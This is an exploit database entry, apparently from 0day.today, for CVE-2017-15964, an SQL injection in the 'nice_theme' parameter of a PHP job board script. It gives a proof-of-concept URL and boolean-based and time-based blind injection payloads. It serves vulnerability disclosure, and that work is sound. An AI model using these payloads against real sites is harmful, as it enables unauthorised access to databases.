Lucene search

K
zdtIhsan Sencan1337DAY-ID-28925
HistoryOct 31, 2017 - 12:00 a.m.

Job Board Script - nice_theme SQL Injection Vulnerability

2017-10-3100:00:00
Ihsan Sencan
0day.today
16

EPSS

0.002

Percentile

57.4%

Exploit for php platform in category web applications

# # # # # 
# Exploit Title: Job Board Script - SQL Injection
# Vendor Homepage: http://www.nicephpscripts.com/
# Software http://www.nicephpscripts.com/job_board_script.htm
# Demo: http://www.nicephpscripts.com/scripts/faqscript/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15964
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/index.php?nice_theme=[SQL]
# 
# Parameter: nice_theme (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: nice_theme=2 AND 9686=9686
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: nice_theme=2 AND SLEEP(5)
# 
# Etc..
# # # # #

#  0day.today [2018-03-20]  #

EPSS

0.002

Percentile

57.4%